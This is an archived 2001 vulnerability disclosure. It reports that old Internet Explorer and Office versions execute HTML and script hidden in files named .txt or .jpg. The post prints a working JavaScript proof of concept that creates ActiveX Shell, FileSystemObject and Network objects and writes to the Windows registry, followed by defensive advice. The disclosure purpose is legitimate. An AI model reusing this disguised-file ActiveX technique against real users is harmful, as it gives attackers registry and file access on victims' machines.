TXT or HTML? -- IE NEW BUG

[cr4zybird <cr4zybird () hotmail com>]

TXT or HTML? -- IE NEW BUG
vulnerable programs:
IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft 
Excel,Microsoft PowerPoint, 
Tencent explorer (I've tested all the versions of IE that 
i can find, they 
are all vulnerable)

description:
IE doesn't recognize the extensions of files, which 
may contain some html 
code.
Write a HTML file on NOTEPAD. save it as *.txt. 
upload to any server.then 
use IE to visit this page.Found: IE excuted the HTML 
code which contained in 
*.txt files. and we can also change the extension, like 
*.jpg or other 
non-downloaded files.finally i found that IE can't 
recognize the extension 
of a file.
using this bug, anyone who knows how to make 
webpages can successfully 
attack other people. because of user's generic 
thought, they think only 
.html/.htm can be used to attack, but now, 
even .txt.jpg.png can do 
everything that a hmtl page can do! even the e-mail 
attachment! because 
outlook express is vulnerable, too. treat it seriously 
please.
Due to the company's not wanting to be responsible 
for this bug, please, 
take it seriously, and be aware.
here is a source code, just to prove the existence of 
this new bug.

<SCRIPT Language="JavaScript" 
type="text/javascript">
<!--

document.write("<APPLET HEIGHT=0 WIDTH=0 
code=com.ms.activeX.ActiveXComponent></APPLE
T>");

function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-
00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-
00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf("Chg") == -1)
{


Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet 
Explorer\\Main\\Window 
Title", "it's a good day to die!");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet 
Explorer\\Main\\Window 
Title", "it's a good day to die!");
var expdate = new Date((new Date()).getTime() + 
(1));
document.cookie="Chg=general; expires=" + 
expdate.toGMTString() + "; 
path=/;"

}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();

// -->
</SCRIPT>

<img src=http://www.gnu.org/graphics/gnu-head-
sm.jpg>


it's a .jpg which may change your IE title(you have to 
change the extension 
to *.jpg first)
non-vulnerable programs:
netscape

solutions:
1) download some antivirus softwares. and update 
the virus datebase all the 
time. and change the name of some 'dangerous' 
programs  in your system, such 
as format.exe deltree.exe etc. i.e change format.exe 
to format_0.com etc.
2) try, not to visit those so-
called 'hacker'or'cracking'sites. most of the 
time, you are the victim while you want to learn to 
attack others.
3) if you have to go visit some site that you are not 
quite sure if they are 
safe. then check it here first: 
http://crazybird.51.net/look.htm
   or you can also save the source code of this page 
to your computer, then 
save it as *.htm, so you can execute it on your own 
comp. be aware if it 
says "the web page contains some unsafe ActiveX" 
or something like that,
   then you'd better not to execute that ActiveX widget. 
and i can't promise 
that it can give you this kind of warn for any 
aggressive files..
4) DO NOT open your attachment in IE!!!!!don't ever 
open any type of file in 
IE directly!!!BE AWARE!! you'd better use antivirus 
to scan it before you 
open it after you've download it to ur computer.
5) Update the system patch immediately if the patch 
comes out.

if you still have quesitions, mail to:
cr4zybird () hotmail com
thanks to: springcream, skywind, nETMONKEY, 
xiajian, Nancy. they've gave me 
a lot of help on testing and communicatin with 
Microsoft

by:
crazybird
cr4zybird () hotmail com
IRC: irc.sunnet.org 6667
#CNFORCE
26/7/01 China